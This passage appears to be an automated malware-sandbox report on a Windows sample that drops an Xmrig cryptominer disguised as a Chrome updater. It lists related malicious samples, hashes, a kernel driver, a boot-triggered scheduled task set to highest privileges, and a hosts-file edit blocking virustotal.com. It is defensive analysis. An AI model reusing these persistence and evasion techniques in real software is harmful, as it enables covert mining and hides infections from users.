	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	104.20.4.235
	file.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
xmr-eu1.nanopool.org	aAcx14Rjtw.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	gaozw40v.exe	Get hash	malicious	Xmrig	Browse	51.89.23.91
	file.exe	Get hash	malicious	Xmrig	Browse	54.37.232.103
	nlGOh9K5X5.exe	Get hash	malicious	Xmrig	Browse	51.15.58.224
	LfHJdrALlh.exe	Get hash	malicious	Xmrig	Browse	51.15.58.224
	rLaC8kO1rD.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	6xQ8CMUaES.exe	Get hash	malicious	Xmrig	Browse	51.89.23.91
	4o8Tgrb384.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	rtYpMDeKUq.exe	Get hash	malicious	Xmrig	Browse	51.89.23.91
	NH95Vhokye.exe	Get hash	malicious	Xmrig	Browse	54.37.137.114

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OnlineSASFR	8p5iD52knN.exe	Get hash	malicious	Azorult	Browse	51.15.241.168
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	212.129.47.239
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	62.210.51.189
	nsharm5.elf	Get hash	malicious	Mirai	Browse	51.159.173.14
	nsharm.elf	Get hash	malicious	Mirai	Browse	163.172.143.216
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	51.158.216.108
	StGx54oFh6.exe	Get hash	malicious	Quasar	Browse	51.15.17.193
	1AqzGcCKey.exe	Get hash	malicious	Quasar	Browse	51.15.17.193
	BJtvb5Vdhh.exe	Get hash	malicious	Quasar	Browse	51.15.17.193
	HquJT7q6xG.exe	Get hash	malicious	Quasar	Browse	51.15.17.193
OVHFR	file.exe	Get hash	malicious	Xmrig	Browse	51.222.200.133
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	54.38.113.4
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Xmrig	Browse	51.222.200.133
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Xmrig	Browse	51.222.106.253
	cxZuGa.exe	Get hash	malicious	Unknown	Browse	139.99.188.124
	https://tr171139818.amoliani.com/c/mm14r39/e-v_xxa-/imz77nt3nps	Get hash	malicious	Unknown	Browse	213.32.5.20
	book-captcha.com.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	91.134.9.159
	armv7l.elf	Get hash	malicious	Unknown	Browse	91.134.44.56
	aAcx14Rjtw.exe	Get hash	malicious	Xmrig	Browse	146.59.154.106
	DF2.exe	Get hash	malicious	Unknown	Browse	51.83.132.16
CLOUDFLARENETUS	http://hotelyetipokhara.com	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://realpaperworks.com/wp-content/red/UhPIYa	Get hash	malicious	Unknown	Browse	104.21.96.1
	http://adflowtube.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://authmycookie.com	Get hash	malicious	Unknown	Browse	172.67.198.196
	http://keywestlending.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.64.154.248
	http://vaporblastingservices.com	Get hash	malicious	Unknown	Browse	104.18.26.193
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.157.254

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	based.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	setup.exe	Get hash	malicious	Unknown	Browse
	iqA8j9yGcd.exe	Get hash	malicious	HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT	Browse
	VaTlw2kNGc.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	87Bym0x4Fy.exe	Get hash	malicious	Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT	Browse
	8Ck8T5qRcC.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	TS-240605-Millenium1.exe	Get hash	malicious	Blank Grabber, Discord Token Stealer, Millenuim RAT, Xmrig	Browse
	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
	hacn.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT, Xmrig	Browse
	SecuriteInfo.com.Win64.Evo-gen.25073.24639.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\Desktop\hiwA7Blv7C.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5925152
Entropy (8bit):	7.664425949989934
Encrypted:	false
SSDEEP:	98304:iOKxam2uqpBZuVEqrPb/1wLpH6zjH5O8MJcZycvM+PvwwDqxmzN2TP4q:znvPZuVEqrPb/1YyZkJR+PYwmwS4q
MD5:	7BF019893EB8DF6FC169E8F9EF5269C6
SHA1:	41FCC57F71768D9DF534632D3D7C52138D59E3E1
SHA-256:	882B403DCC4C6928DE9D4A86BF4FBB650909485E828CBA37258D68BE81340739
SHA-512:	280EE6D446B1261AC2A5ECDC1ECC30DAA073EBFB4FC6864040CA4AD23D89FF2D912528DF56CFA2CDE9012AA6DDB60108BEB60982DBF710D2670ABA7E90A99352
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.P...<Z................@..............................Z.......Z...`... ...............................................Z.......Z......@Z.$....@Z. )....Z.x............................2Z.(.....................Z.`............................text....O.......P..................`..`.data.....Y..`....Y..T..............@....rdata.. .... Z.......Z.............@..@.pdata..$....@Z......"Z.............@..@.xdata..H....PZ......*Z.............@..@.bss....`....`Z..........................idata........Z......0Z.............@....CRT....`.....Z......6Z.............@....tls..........Z......8Z.............@....rsrc.........Z......:Z.............@....reloc..x.....Z......>Z.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kxbd2xgx.yhf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l05upsxx.v0u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzlp1tjc.hxo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uozdtlcq.k1w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp

Download File

Process:	C:\Users\user\Desktop\hiwA7Blv7C.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	161792
Entropy (8bit):	5.8318794599287465
Encrypted:	false
SSDEEP:	3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
MD5:	1667C96053EAA078109F8B0C9500FC9D
SHA1:	E0F567763BAAAA757F66F96951D9810F45F69F30
SHA-256:	F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
SHA-512:	6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Joe Sandbox View:	Filename: based.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: iqA8j9yGcd.exe, Detection: malicious, Browse Filename: VaTlw2kNGc.exe, Detection: malicious, Browse Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse Filename: DevxExecutor.exe, Detection: malicious, Browse Filename: hacn.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.25073.24639.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\qdsaknsehgak.xml

Download File

Process:	C:\Users\user\Desktop\hiwA7Blv7C.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	4680
Entropy (8bit):	3.7113762133371053
Encrypted:	false
SSDEEP:	96:pYMguQII4i5m6h4aGdinipV9ll7UY5HAmzQ+:9A4U/xne7HO+
MD5:	5F3BB20D4CDB0EED283ECCDCD53478CE
SHA1:	CF2566DBB83624692B075C1F9FE90FA07653CBD8
SHA-256:	EB0C47C06AD0AB5AC8031CD9B0B56BF18411EF22681AF3868086077FEC0E7110
SHA-512:	7BDF4CF755CC40ED68BF84D5C9851A7D1480C0A2C332A688E7BB07F9EA34E18E7B5A6382B3C6611517BE213F4DC25F6169FDA07BFB196BE424EDA57BDF9C8F26
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\Users\user\Desktop\hiwA7Blv7C.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.68208976727935
Encrypted:	false
SSDEEP:	24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcV
MD5:	0008F4A213BC7885A8CCEB5417578349
SHA1:	877DE0BFE93C374E066A0F7707580A1280B7F959
SHA-256:	9F2250A4FFE3ACC970FAAD53D5F89BB90F8B8D5B48EBD60A69CD00C9ACD029FF
SHA-512:	DFBFB7EEE1482E0C979B6BE7F0D16CE965EDB362C66DB1E89FE17F5FA8717D7A19553906A9A9BB2501873496916F7FC45136E87B871AF4BEE3E979301659E7F3
Malicious:	true
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 www.virustotal.com

C:\Windows\Temp\__PSScriptPolicyTest_g5yeucz4.tjv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_htrkvy5a.b13.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ma3h1dkh.sgu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_w5bttgrb.vwf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\bzqlyietdwsj.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5651456
Entropy (8bit):	6.686504811317419
Encrypted:	false
SSDEEP:	98304:arBrt3+RH2GEo/L7pdenlL17ouknW3jZAk3cB0vyRfgIlFQSmf1JjGGI0:aj3+RZyjZn3c5RYIlGLfjGGI
MD5:	71BA2926F4F302EA7524510B7A07CD28
SHA1:	A9AE469CE440353F66FF604EDE55528F95D3F6BA
SHA-256:	3D0E5AED0AFC5A7719AF93C49C55E6CE91ADFFE5CC50D1597ABB1CCED05FFAA3
SHA-512:	3F6580D75D177222719A79E9AA79F6361D545AE5E3135D77D7C0C96C97C87A02E92F3EFEC8C21F0D4AB643DE8F8E261C0026C5015A00B0785A9FAC55CF187089
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\bzqlyietdwsj.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\bzqlyietdwsj.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\bzqlyietdwsj.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\bzqlyietdwsj.tmp, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......H.- ..Cs..Cs..CsG.@r..CsG.Fr..CsG.Gr..Cs...s..Cs..Gr..Cs..Frf.Cs..@r..Cs:.Gr..Cs..Bs..CsG.Br..Cs..Gr_.Cs:.Jr..Cs:.@r..Cs:..s..Cs...s..Cs:.Ar..CsRich..Cs................PE..d....r.d.........."....%.l;...D......7........@..........................................`..................................................CR...............}.D............ ..x.....N.......................N.(...@.N.@.............;.8............................text....k;......l;................. ..`.rdata........;......p;.............@..@.data.....+..pR......ZR.............@....pdata..D.....}......dS.............@..@_RANDOMX.............nU.............@..`_TEXT_CN.&.......(...\|U.............@..`_TEXT_CN..............U.............@..`_RDATA..\.............U.............@..@.rsrc.................U.............@..@.reloc..x.... ........U.............@..B........................................

C:\Windows\Temp\libtqlibdoyd.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Temp\qdsaknsehgak.xml

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.664425949989934
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	hiwA7Blv7C.exe
File size:	5'925'152 bytes
MD5:	7bf019893eb8df6fc169e8f9ef5269c6
SHA1:	41fcc57f71768d9df534632d3d7c52138d59e3e1
SHA256:	882b403dcc4c6928de9d4a86bf4fbb650909485e828cba37258d68be81340739
SHA512:	280ee6d446b1261ac2a5ecdc1ecc30daa073ebfb4fc6864040ca4ad23d89ff2d912528df56cfa2cde9012aa6ddb60108beb60982dbf710d2670aba7e90a99352
